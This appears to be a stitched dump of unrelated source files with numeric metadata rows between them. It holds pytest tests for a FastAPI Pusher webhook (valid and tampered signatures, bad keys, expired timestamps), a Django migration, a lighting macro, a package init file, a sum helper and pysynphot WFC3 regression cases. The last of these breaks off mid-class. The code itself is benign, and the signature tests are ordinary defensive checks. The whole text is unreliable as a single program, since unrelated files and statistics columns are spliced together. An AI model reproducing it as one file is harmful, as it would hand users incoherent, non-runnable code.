            json.dumps(json_data).encode("utf8"),
            hashlib.sha256,
        ).hexdigest()
        return {
            "X-Pusher-Key": settings.pusher_key if key is None else key,
            "X-Pusher-Signature": f"{signature}{signature_suffix}",
        }

    @pytest.mark.asyncio
    async def test_pusher_channel_occupied(
        self, app: FastAPI, db: Database, current_user: User, authorized_client: AsyncClient, event_loop
    ):
        """A channel_occupied event adds the channel to the user's online list."""
        settings = get_settings()
        assert current_user.online_channels == []

        channel_id = f"private-{str(current_user.id)}"
        current_time = time.time() * 1000
        json_data = {"time_ms": current_time, "events": [{"channel": channel_id, "name": "channel_occupied"}]}
        headers = self._pusher_headers(settings, json_data)

        response = await authorized_client.post("/webhooks/pusher", json=json_data, headers=headers)
        assert response.status_code == 200

        # The handler updates the user out-of-band; wait briefly before checking.
        # FIX: asyncio.sleep()'s `loop` argument was deprecated in 3.8 and
        # removed in Python 3.10 — the coroutine runs on the current loop anyway.
        await asyncio.sleep(random.random())
        await current_user.reload()
        assert current_user.online_channels == [channel_id]

    @pytest.mark.asyncio
    async def test_pusher_channel_vacated(
        self, app: FastAPI, db: Database, current_user: User, authorized_client: AsyncClient, event_loop
    ):
        """A channel_vacated event removes the channel from the online list."""
        settings = get_settings()
        channel_id = f"private-{str(current_user.id)}"
        current_user.online_channels = [channel_id]
        await current_user.commit()
        assert current_user.online_channels == [channel_id]

        current_time = time.time() * 1000
        json_data = {"time_ms": current_time, "events": [{"channel": channel_id, "name": "channel_vacated"}]}
        headers = self._pusher_headers(settings, json_data)

        response = await authorized_client.post("/webhooks/pusher", json=json_data, headers=headers)
        assert response.status_code == 200

        # See note above about the removed `loop` argument.
        await asyncio.sleep(random.random())
        await current_user.reload()
        assert current_user.online_channels == []

    @pytest.mark.asyncio
    async def test_pusher_expired_webhook(
        self,
        app: FastAPI,
        db: Database,
        current_user: User,
        authorized_client: AsyncClient,
    ):
        """A webhook timestamped a day in the past is rejected with 401."""
        settings = get_settings()
        channel_id = f"private-{str(current_user.id)}"
        current_user.online_channels = [channel_id]
        await current_user.commit()
        assert current_user.online_channels == [channel_id]

        current_time = arrow.utcnow().shift(days=-1).float_timestamp * 1000
        json_data = {"time_ms": current_time, "events": [{"channel": channel_id, "name": "channel_vacated"}]}
        headers = self._pusher_headers(settings, json_data)

        response = await authorized_client.post("/webhooks/pusher", json=json_data, headers=headers)
        assert response.status_code == 401

    @pytest.mark.asyncio
    async def test_pusher_bad_signature(
        self,
        app: FastAPI,
        db: Database,
        current_user: User,
        authorized_client: AsyncClient,
    ):
        """A tampered signature is rejected with 401."""
        settings = get_settings()
        channel_id = f"private-{str(current_user.id)}"
        current_user.online_channels = [channel_id]
        await current_user.commit()
        assert current_user.online_channels == [channel_id]

        current_time = time.time() * 1000
        json_data = {"time_ms": current_time, "events": [{"channel": channel_id, "name": "channel_vacated"}]}
        headers = self._pusher_headers(settings, json_data, signature_suffix="-hack")

        response = await authorized_client.post("/webhooks/pusher", json=json_data, headers=headers)
        assert response.status_code == 401

    @pytest.mark.asyncio
    async def test_pusher_bad_key(
        self,
        app: FastAPI,
        db: Database,
        current_user: User,
        authorized_client: AsyncClient,
    ):
        """An unknown Pusher app key is rejected with 401."""
        settings = get_settings()
        channel_id = f"private-{str(current_user.id)}"
        current_user.online_channels = [channel_id]
        await current_user.commit()
        assert current_user.online_channels == [channel_id]

        current_time = time.time() * 1000
        json_data = {"time_ms": current_time, "events": [{"channel": channel_id, "name": "channel_vacated"}]}
        headers = self._pusher_headers(settings, json_data, key="no-key")

        response = await authorized_client.post("/webhooks/pusher", json=json_data, headers=headers)
        assert response.status_code == 401
| 40.601504
| 110
| 0.663704
| 632
| 5,400
| 5.446203
| 0.131329
| 0.086287
| 0.054329
| 0.079895
| 0.897443
| 0.897443
| 0.897443
| 0.875654
| 0.851249
| 0.842243
| 0
| 0.014414
| 0.216296
| 5,400
| 132
| 111
| 40.909091
| 0.798913
| 0
| 0
| 0.8
| 0
| 0
| 0.118148
| 0.027778
| 0
| 0
| 0
| 0
| 0.104348
| 1
| 0
| false
| 0
| 0.113043
| 0
| 0.121739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
09427767e0844aa1b08fbee0f4f5a9f3087225d5
| 3,699
|
py
|
Python
|
ghostwriter/shepherd/migrations/0035_auto_20220205_0026.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | 1
|
2022-02-04T20:24:35.000Z
|
2022-02-04T20:24:35.000Z
|
ghostwriter/shepherd/migrations/0035_auto_20220205_0026.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | null | null | null |
ghostwriter/shepherd/migrations/0035_auto_20220205_0026.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.2.11 on 2022-02-05 00:26
from django.db import migrations, models
class Migration(migrations.Migration):
    """Switch the implicit `id` primary key of every shepherd model to
    BigAutoField (the Django 3.2 DEFAULT_AUTO_FIELD change)."""

    dependencies = [
        ('shepherd', '0034_remove_domain_health_dns'),
    ]

    # Every model receives the identical AlterField, so the operation list
    # is generated from the model names instead of being spelled out 16 times.
    _MODEL_NAMES = [
        'activitytype',
        'auxserveraddress',
        'domain',
        'domainnote',
        'domainserverconnection',
        'domainstatus',
        'healthstatus',
        'history',
        'serverhistory',
        'servernote',
        'serverprovider',
        'serverrole',
        'serverstatus',
        'staticserver',
        'transientserver',
        'whoisstatus',
    ]

    operations = [
        migrations.AlterField(
            model_name=model_name,
            name='id',
            field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
        )
        for model_name in _MODEL_NAMES
    ]
| 39.351064
| 111
| 0.60638
| 366
| 3,699
| 5.942623
| 0.153005
| 0.088276
| 0.183908
| 0.213333
| 0.825287
| 0.825287
| 0.825287
| 0.825287
| 0.825287
| 0.825287
| 0
| 0.007449
| 0.274128
| 3,699
| 93
| 112
| 39.774194
| 0.802607
| 0.012436
| 0
| 0.735632
| 1
| 0
| 0.0808
| 0.013969
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011494
| 0
| 0.045977
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
094b162f94aef9b6c8d72a35140ceb1cb7970705
| 250
|
py
|
Python
|
Macros/Colours/Pink/Pink.py
|
rec/dmxis
|
540baa59df6f4ae39990e5888f90b95caa362279
|
[
"Artistic-2.0"
] | 2
|
2019-05-26T15:11:18.000Z
|
2021-12-27T21:05:32.000Z
|
Macros/Colours/Pink/Pink.py
|
rec/DMXIS
|
540baa59df6f4ae39990e5888f90b95caa362279
|
[
"Artistic-2.0"
] | null | null | null |
Macros/Colours/Pink/Pink.py
|
rec/DMXIS
|
540baa59df6f4ae39990e5888f90b95caa362279
|
[
"Artistic-2.0"
] | null | null | null |
#===============================================================
# DMXIS Macro (c) 2010 db audioware limited
#===============================================================
# Sets the fixture colour to pink: RGB (255, 192, 203) is the
# standard CSS/web colour "pink".
import System.RGB
from System.RGB import *

RgbColour(255,192,203)
| 27.777778
| 65
| 0.34
| 18
| 250
| 4.722222
| 0.833333
| 0.211765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058296
| 0.108
| 250
| 8
| 66
| 31.25
| 0.32287
| 0.672
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
11d443e4e2a2185d8bec490c10e4085a1a5323ca
| 515
|
py
|
Python
|
cv_lib/cv_lib/segmentation/models/__init__.py
|
squassina/seismic-deeplearning
|
ffb2855249e581f4900665c2616cefb019621675
|
[
"MIT"
] | 270
|
2019-12-17T13:40:51.000Z
|
2022-03-20T10:02:11.000Z
|
cv_lib/cv_lib/segmentation/models/__init__.py
|
squassina/seismic-deeplearning
|
ffb2855249e581f4900665c2616cefb019621675
|
[
"MIT"
] | 233
|
2019-12-18T17:59:36.000Z
|
2021-08-03T13:43:49.000Z
|
cv_lib/cv_lib/segmentation/models/__init__.py
|
squassina/seismic-deeplearning
|
ffb2855249e581f4900665c2616cefb019621675
|
[
"MIT"
] | 118
|
2019-12-17T13:41:43.000Z
|
2022-03-29T02:06:36.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# Each model module is imported purely for its import-time side effects;
# the module names themselves are deliberately unused, hence the
# "noqa: F401" suppressions. NOTE(review): the side-effect assumption is
# inferred from the noqa markers -- confirm against the model modules.
import cv_lib.segmentation.models.seg_hrnet  # noqa: F401
import cv_lib.segmentation.models.resnet_unet  # noqa: F401
import cv_lib.segmentation.models.unet  # noqa: F401
import cv_lib.segmentation.models.section_deconvnet  # noqa: F401
import cv_lib.segmentation.models.patch_deconvnet  # noqa: F401
import cv_lib.segmentation.models.patch_deconvnet_skip  # noqa: F401
import cv_lib.segmentation.models.section_deconvnet_skip  # noqa: F401
| 46.818182
| 70
| 0.815534
| 73
| 515
| 5.547945
| 0.328767
| 0.138272
| 0.190123
| 0.397531
| 0.787654
| 0.716049
| 0.716049
| 0.624691
| 0.51358
| 0.274074
| 0
| 0.045553
| 0.104854
| 515
| 10
| 71
| 51.5
| 0.832972
| 0.281553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
11ee4afb8b55e5dcf04950d223bd62bcd89dc58d
| 100
|
py
|
Python
|
python/src/example.py
|
kodability/test-images
|
def67f4e8b6798df7a3b6d1a1f3c045e1d3d6c07
|
[
"Apache-2.0"
] | null | null | null |
python/src/example.py
|
kodability/test-images
|
def67f4e8b6798df7a3b6d1a1f3c045e1d3d6c07
|
[
"Apache-2.0"
] | null | null | null |
python/src/example.py
|
kodability/test-images
|
def67f4e8b6798df7a3b6d1a1f3c045e1d3d6c07
|
[
"Apache-2.0"
] | null | null | null |
def sum(value_from, value_to):
    """Return the sum of the consecutive integers value_from..value_to.

    Uses the closed-form arithmetic-series formula
    (a + b) * (b - a + 1) / 2 in O(1). For any two integers a, b exactly
    one of (a + b) and (b - a + 1) is even (their sum 2*b + 1 is odd), so
    floor division by 2 is exact; using ``//`` keeps the result an int and
    avoids the float conversion -- and precision loss above 2**53 -- that
    Python 3 true division would introduce.

    If value_to < value_from the range is empty-or-inverted and the same
    formula is returned (0 for value_to == value_from - 1), matching the
    original behavior. Inputs are expected to be integers.

    NOTE: this function intentionally shadows the builtin ``sum``; the
    name is kept for caller compatibility.
    """
    return (value_from + value_to) * (value_to - value_from + 1) // 2
| 33.333333
| 68
| 0.68
| 17
| 100
| 3.647059
| 0.470588
| 0.435484
| 0.451613
| 0.516129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024691
| 0.19
| 100
| 2
| 69
| 50
| 0.740741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
11f7d1934fa29a2e21ee62102e3487c4e0d57512
| 30,556
|
py
|
Python
|
commissioning/wfc3_uvis1_spec_62_cases.py
|
dobos/pysynphot
|
5d2e0b52ceda78890940ac9239c2d88e149e0bed
|
[
"BSD-3-Clause"
] | 24
|
2015-01-04T23:38:21.000Z
|
2022-02-01T00:11:07.000Z
|
commissioning/wfc3_uvis1_spec_62_cases.py
|
dobos/pysynphot
|
5d2e0b52ceda78890940ac9239c2d88e149e0bed
|
[
"BSD-3-Clause"
] | 126
|
2015-01-29T14:50:37.000Z
|
2022-02-15T01:58:13.000Z
|
commissioning/wfc3_uvis1_spec_62_cases.py
|
dobos/pysynphot
|
5d2e0b52ceda78890940ac9239c2d88e149e0bed
|
[
"BSD-3-Clause"
] | 25
|
2015-02-09T12:12:02.000Z
|
2021-09-09T13:06:54.000Z
|
from pytools import testutil
import sys
import basecase
class calcspecCase1(basecase.calcspecCase):
    """calcspec regression case for the icat(k93models,9230,0.0,4.1) spectrum."""

    def setUp(self):
        # Case parameters consumed by the basecase driver.
        self.spectrum = "icat(k93models,9230,0.0,4.1)"
        self.obsmode = "None"
        self.etcid = "None"
        self.subset = True
        # Record this file as the case origin, then execute the case.
        self.setglobal(__file__)
        self.runpy()
class countrateCase1(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=True
self.etcid="['uvsp1006.tab:5000', 'uvsp1006.tab:5001', 'uvsp1006.tab:5002', 'uvsp1006.tab:5003', 'uvsp1006.tab:5004', 'uvsp1006.tab:5005', 'uvsp1006.tab:5006', 'uvsp1006.tab:5007', 'uvsp1006.tab:5008', 'uvsp1006.tab:5009', 'uvsp1006.tab:5010', 'uvsp1006.tab:5011', 'uvsp1006.tab:5012', 'uvsp1006.tab:5013', 'uvsp1006.tab:5014', 'uvsp1006.tab:5015', 'uvsp1006.tab:5016', 'uvsp1006.tab:5017', 'uvsp1006.tab:5018', 'uvsp1006.tab:5019', 'uvsp1006.tab:5020', 'uvsp1006.tab:5021', 'uvsp1006.tab:5022', 'uvsp1006.tab:5023', 'uvsp1006.tab:5024', 'uvsp1006.tab:5025', 'uvsp1006.tab:5026', 'uvsp1006.tab:5027', 'uvsp1006.tab:5028', 'uvsp1006.tab:5029', 'uvsp1006.tab:5030', 'uvsp1006.tab:5031', 'uvsp1006.tab:5032', 'uvsp1006.tab:5033', 'uvsp1006.tab:5034', 'uvsp1006.tab:5035', 'uvsp1006.tab:5036', 'uvsp1006.tab:5037', 'uvsp1006.tab:5038', 'uvsp1006.tab:5039', 'uvsp1006.tab:5040', 'uvsp1006.tab:5041', 'uvsp1006.tab:5042', 'uvsp1006.tab:5043', 'uvsp1006.tab:5044', 'uvsp1006.tab:5045', 'uvsp1006.tab:5046', 'uvsp1006.tab:5047', 'uvsp1006.tab:5048', 'uvsp1006.tab:5049', 'uvsp1006.tab:5050', 'uvsp1006.tab:5051', 'uvsp1006.tab:5052', 'uvsp1006.tab:5053', 'uvsp1006.tab:5054', 'uvsp1006.tab:5055', 'uvsp1006.tab:5056', 'uvsp1006.tab:5057', 'uvsp1006.tab:5058', 'uvsp1006.tab:5059', 'uvsp1006.tab:5060', 'uvsp1006.tab:5061', 'uvsp1006.tab:5062', 'uvsp1006.tab:5063', 'uvsp1006.tab:5064', 'uvsp1006.tab:5065', 'uvsp1006.tab:5066', 'uvsp1006.tab:5067', 'uvsp1006.tab:5068', 'uvsp1006.tab:5069', 'uvsp1006.tab:5070', 'uvsp1006.tab:5071', 'uvsp1006.tab:5072', 'uvsp1006.tab:5073', 'uvsp1006.tab:5074', 'uvsp1006.tab:5075', 'uvsp1006.tab:5076', 'uvsp1006.tab:5077', 'uvsp1006.tab:5078', 'uvsp1006.tab:5079', 'uvsp1006.tab:5080', 'uvsp1006.tab:5081', 'uvsp1006.tab:5082', 'uvsp1006.tab:5083', 'uvsp1006.tab:5084', 'uvsp1006.tab:5085', 'uvsp1006.tab:5086', 'uvsp1006.tab:5087', 'uvsp1006.tab:5088', 'uvsp1006.tab:5089', 'uvsp1006.tab:5090', 'uvsp1006.tab:5091', 'uvsp1006.tab:5092', 'uvsp1006.tab:5093', 
'uvsp1006.tab:5094', 'uvsp1006.tab:5095', 'uvsp1006.tab:5096', 'uvsp1006.tab:5097', 'uvsp1006.tab:5098', 'uvsp1006.tab:5099', 'uvsp1006.tab:5100', 'uvsp1006.tab:5101', 'uvsp1006.tab:5102', 'uvsp1006.tab:5103', 'uvsp1006.tab:5104', 'uvsp1006.tab:5105', 'uvsp1006.tab:5106', 'uvsp1006.tab:5107', 'uvsp1006.tab:5108', 'uvsp1006.tab:5109', 'uvsp1006.tab:5110', 'uvsp1006.tab:5111', 'uvsp1006.tab:5112', 'uvsp1006.tab:5113', 'uvsp1006.tab:5114', 'uvsp1006.tab:5115', 'uvsp1006.tab:5116', 'uvsp1006.tab:5117', 'uvsp1006.tab:5118', 'uvsp1006.tab:5119', 'uvsp1006.tab:5120', 'uvsp1006.tab:5121', 'uvsp1006.tab:5122', 'uvsp1006.tab:5123', 'uvsp1006.tab:5124', 'uvsp1006.tab:5125', 'uvsp1006.tab:5126', 'uvsp1006.tab:5127', 'uvsp1006.tab:5128', 'uvsp1006.tab:5129', 'uvsp1006.tab:5130', 'uvsp1006.tab:5131', 'uvsp1006.tab:5132', 'uvsp1006.tab:5133', 'uvsp1006.tab:5134', 'uvsp1006.tab:5135', 'uvsp1006.tab:5136', 'uvsp1006.tab:5137', 'uvsp1006.tab:5138', 'uvsp1006.tab:5139', 'uvsp1006.tab:5140', 'uvsp1006.tab:5141', 'uvsp1006.tab:5142', 'uvsp1006.tab:5143', 'uvsp1006.tab:5144', 'uvsp1006.tab:5145', 'uvsp1006.tab:5146', 'uvsp1006.tab:5147', 'uvsp1006.tab:5148', 'uvsp1006.tab:5149']"
self.setglobal(__file__)
self.runpy()
class calcphotCase1(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=True
self.etcid="['uvsp1006.tab:5000', 'uvsp1006.tab:5001', 'uvsp1006.tab:5002', 'uvsp1006.tab:5003', 'uvsp1006.tab:5004', 'uvsp1006.tab:5005', 'uvsp1006.tab:5006', 'uvsp1006.tab:5007', 'uvsp1006.tab:5008', 'uvsp1006.tab:5009', 'uvsp1006.tab:5010', 'uvsp1006.tab:5011', 'uvsp1006.tab:5012', 'uvsp1006.tab:5013', 'uvsp1006.tab:5014', 'uvsp1006.tab:5015', 'uvsp1006.tab:5016', 'uvsp1006.tab:5017', 'uvsp1006.tab:5018', 'uvsp1006.tab:5019', 'uvsp1006.tab:5020', 'uvsp1006.tab:5021', 'uvsp1006.tab:5022', 'uvsp1006.tab:5023', 'uvsp1006.tab:5024', 'uvsp1006.tab:5025', 'uvsp1006.tab:5026', 'uvsp1006.tab:5027', 'uvsp1006.tab:5028', 'uvsp1006.tab:5029', 'uvsp1006.tab:5030', 'uvsp1006.tab:5031', 'uvsp1006.tab:5032', 'uvsp1006.tab:5033', 'uvsp1006.tab:5034', 'uvsp1006.tab:5035', 'uvsp1006.tab:5036', 'uvsp1006.tab:5037', 'uvsp1006.tab:5038', 'uvsp1006.tab:5039', 'uvsp1006.tab:5040', 'uvsp1006.tab:5041', 'uvsp1006.tab:5042', 'uvsp1006.tab:5043', 'uvsp1006.tab:5044', 'uvsp1006.tab:5045', 'uvsp1006.tab:5046', 'uvsp1006.tab:5047', 'uvsp1006.tab:5048', 'uvsp1006.tab:5049', 'uvsp1006.tab:5050', 'uvsp1006.tab:5051', 'uvsp1006.tab:5052', 'uvsp1006.tab:5053', 'uvsp1006.tab:5054', 'uvsp1006.tab:5055', 'uvsp1006.tab:5056', 'uvsp1006.tab:5057', 'uvsp1006.tab:5058', 'uvsp1006.tab:5059', 'uvsp1006.tab:5060', 'uvsp1006.tab:5061', 'uvsp1006.tab:5062', 'uvsp1006.tab:5063', 'uvsp1006.tab:5064', 'uvsp1006.tab:5065', 'uvsp1006.tab:5066', 'uvsp1006.tab:5067', 'uvsp1006.tab:5068', 'uvsp1006.tab:5069', 'uvsp1006.tab:5070', 'uvsp1006.tab:5071', 'uvsp1006.tab:5072', 'uvsp1006.tab:5073', 'uvsp1006.tab:5074', 'uvsp1006.tab:5075', 'uvsp1006.tab:5076', 'uvsp1006.tab:5077', 'uvsp1006.tab:5078', 'uvsp1006.tab:5079', 'uvsp1006.tab:5080', 'uvsp1006.tab:5081', 'uvsp1006.tab:5082', 'uvsp1006.tab:5083', 'uvsp1006.tab:5084', 'uvsp1006.tab:5085', 'uvsp1006.tab:5086', 'uvsp1006.tab:5087', 'uvsp1006.tab:5088', 'uvsp1006.tab:5089', 'uvsp1006.tab:5090', 'uvsp1006.tab:5091', 'uvsp1006.tab:5092', 'uvsp1006.tab:5093', 
'uvsp1006.tab:5094', 'uvsp1006.tab:5095', 'uvsp1006.tab:5096', 'uvsp1006.tab:5097', 'uvsp1006.tab:5098', 'uvsp1006.tab:5099', 'uvsp1006.tab:5100', 'uvsp1006.tab:5101', 'uvsp1006.tab:5102', 'uvsp1006.tab:5103', 'uvsp1006.tab:5104', 'uvsp1006.tab:5105', 'uvsp1006.tab:5106', 'uvsp1006.tab:5107', 'uvsp1006.tab:5108', 'uvsp1006.tab:5109', 'uvsp1006.tab:5110', 'uvsp1006.tab:5111', 'uvsp1006.tab:5112', 'uvsp1006.tab:5113', 'uvsp1006.tab:5114', 'uvsp1006.tab:5115', 'uvsp1006.tab:5116', 'uvsp1006.tab:5117', 'uvsp1006.tab:5118', 'uvsp1006.tab:5119', 'uvsp1006.tab:5120', 'uvsp1006.tab:5121', 'uvsp1006.tab:5122', 'uvsp1006.tab:5123', 'uvsp1006.tab:5124', 'uvsp1006.tab:5125', 'uvsp1006.tab:5126', 'uvsp1006.tab:5127', 'uvsp1006.tab:5128', 'uvsp1006.tab:5129', 'uvsp1006.tab:5130', 'uvsp1006.tab:5131', 'uvsp1006.tab:5132', 'uvsp1006.tab:5133', 'uvsp1006.tab:5134', 'uvsp1006.tab:5135', 'uvsp1006.tab:5136', 'uvsp1006.tab:5137', 'uvsp1006.tab:5138', 'uvsp1006.tab:5139', 'uvsp1006.tab:5140', 'uvsp1006.tab:5141', 'uvsp1006.tab:5142', 'uvsp1006.tab:5143', 'uvsp1006.tab:5144', 'uvsp1006.tab:5145', 'uvsp1006.tab:5146', 'uvsp1006.tab:5147', 'uvsp1006.tab:5148', 'uvsp1006.tab:5149']"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase1(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,9230,0.0,4.1),band(johnson,v),23.0,vegamag)"
self.subset=True
self.etcid="['uvsp1006.tab:5000', 'uvsp1006.tab:5002', 'uvsp1006.tab:5003', 'uvsp1006.tab:5004', 'uvsp1006.tab:5005', 'uvsp1006.tab:5007', 'uvsp1006.tab:5008', 'uvsp1006.tab:5009', 'uvsp1006.tab:5010', 'uvsp1006.tab:5012', 'uvsp1006.tab:5013', 'uvsp1006.tab:5014', 'uvsp1006.tab:5015', 'uvsp1006.tab:5017', 'uvsp1006.tab:5018', 'uvsp1006.tab:5019', 'uvsp1006.tab:5020', 'uvsp1006.tab:5022', 'uvsp1006.tab:5023', 'uvsp1006.tab:5024', 'uvsp1006.tab:5025', 'uvsp1006.tab:5027', 'uvsp1006.tab:5028', 'uvsp1006.tab:5029', 'uvsp1006.tab:5030', 'uvsp1006.tab:5031', 'uvsp1006.tab:5032', 'uvsp1006.tab:5033', 'uvsp1006.tab:5034', 'uvsp1006.tab:5035', 'uvsp1006.tab:5036', 'uvsp1006.tab:5037', 'uvsp1006.tab:5038', 'uvsp1006.tab:5039', 'uvsp1006.tab:5040', 'uvsp1006.tab:5041', 'uvsp1006.tab:5042', 'uvsp1006.tab:5043', 'uvsp1006.tab:5044', 'uvsp1006.tab:5045', 'uvsp1006.tab:5046', 'uvsp1006.tab:5047', 'uvsp1006.tab:5048', 'uvsp1006.tab:5049', 'uvsp1006.tab:5050', 'uvsp1006.tab:5051', 'uvsp1006.tab:5052', 'uvsp1006.tab:5053', 'uvsp1006.tab:5054', 'uvsp1006.tab:5055', 'uvsp1006.tab:5056', 'uvsp1006.tab:5057', 'uvsp1006.tab:5058', 'uvsp1006.tab:5059', 'uvsp1006.tab:5060', 'uvsp1006.tab:5061', 'uvsp1006.tab:5062', 'uvsp1006.tab:5063', 'uvsp1006.tab:5064', 'uvsp1006.tab:5065', 'uvsp1006.tab:5066', 'uvsp1006.tab:5067', 'uvsp1006.tab:5068', 'uvsp1006.tab:5069', 'uvsp1006.tab:5070', 'uvsp1006.tab:5071', 'uvsp1006.tab:5072', 'uvsp1006.tab:5073', 'uvsp1006.tab:5074', 'uvsp1006.tab:5075', 'uvsp1006.tab:5076', 'uvsp1006.tab:5077', 'uvsp1006.tab:5078', 'uvsp1006.tab:5079', 'uvsp1006.tab:5080', 'uvsp1006.tab:5081', 'uvsp1006.tab:5082', 'uvsp1006.tab:5083', 'uvsp1006.tab:5084', 'uvsp1006.tab:5085', 'uvsp1006.tab:5086', 'uvsp1006.tab:5087', 'uvsp1006.tab:5088', 'uvsp1006.tab:5089', 'uvsp1006.tab:5090', 'uvsp1006.tab:5091', 'uvsp1006.tab:5092', 'uvsp1006.tab:5093', 'uvsp1006.tab:5094', 'uvsp1006.tab:5095', 'uvsp1006.tab:5096', 'uvsp1006.tab:5097', 'uvsp1006.tab:5098', 'uvsp1006.tab:5099', 
'uvsp1006.tab:5100', 'uvsp1006.tab:5101']"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase2(basecase.SpecSourcerateSpecCase):
    # Spec/source-rate case: renormalized Kurucz model through wfc3,uvis1,g280.
    def setUp(self):
        self.obsmode="wfc3,uvis1,g280"
        self.spectrum="rn(icat(k93models,9230,0.0,4.1),band(johnson,v),18.0,vegamag)"
        self.subset=False
        # ETC reference rows this case corresponds to.
        self.etcid="['uvsp1006.tab:5001', 'uvsp1006.tab:5006', 'uvsp1006.tab:5011', 'uvsp1006.tab:5016', 'uvsp1006.tab:5021', 'uvsp1006.tab:5026']"
        # Register this file as the case origin and run it.
        self.setglobal(__file__)
        self.runpy()
class SpecSourcerateSpecCase4(basecase.SpecSourcerateSpecCase):
    # Spec/source-rate case: brighter (17.0 vegamag) renormalized Kurucz model.
    def setUp(self):
        self.obsmode="wfc3,uvis1,g280"
        self.spectrum="rn(icat(k93models,9230,0.0,4.1),band(johnson,v),17.0,vegamag)"
        self.subset=False
        # ETC reference rows this case corresponds to.
        self.etcid="['uvsp1006.tab:5102', 'uvsp1006.tab:5103', 'uvsp1006.tab:5104', 'uvsp1006.tab:5105', 'uvsp1006.tab:5106', 'uvsp1006.tab:5107', 'uvsp1006.tab:5108', 'uvsp1006.tab:5109', 'uvsp1006.tab:5110', 'uvsp1006.tab:5111', 'uvsp1006.tab:5112', 'uvsp1006.tab:5113', 'uvsp1006.tab:5114', 'uvsp1006.tab:5115', 'uvsp1006.tab:5116', 'uvsp1006.tab:5117', 'uvsp1006.tab:5118', 'uvsp1006.tab:5119', 'uvsp1006.tab:5120', 'uvsp1006.tab:5121', 'uvsp1006.tab:5122', 'uvsp1006.tab:5123', 'uvsp1006.tab:5124', 'uvsp1006.tab:5125']"
        # Register this file as the case origin and run it.
        self.setglobal(__file__)
        self.runpy()
class calcspecCase127(basecase.calcspecCase):
    """calcspec regression case for the icat(k93models,30000,0.0,4.0) spectrum."""

    def setUp(self):
        # Case parameters consumed by the basecase driver.
        self.spectrum = "icat(k93models,30000,0.0,4.0)"
        self.obsmode = "None"
        self.etcid = "None"
        self.subset = False
        # Record this file as the case origin, then execute the case.
        self.setglobal(__file__)
        self.runpy()
class SpecSourcerateSpecCase5(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,30000,0.0,4.0)*ebmvx(0.04,gal1),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5126"
self.setglobal(__file__)
self.runpy()
class calcspecCase128(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="icat(k93models,25400,0.0,3.9)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase6(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,25400,0.0,3.9)*ebmvx(0.08,gal1),band(johnson,b),23.0,vegamag)"
self.subset=False
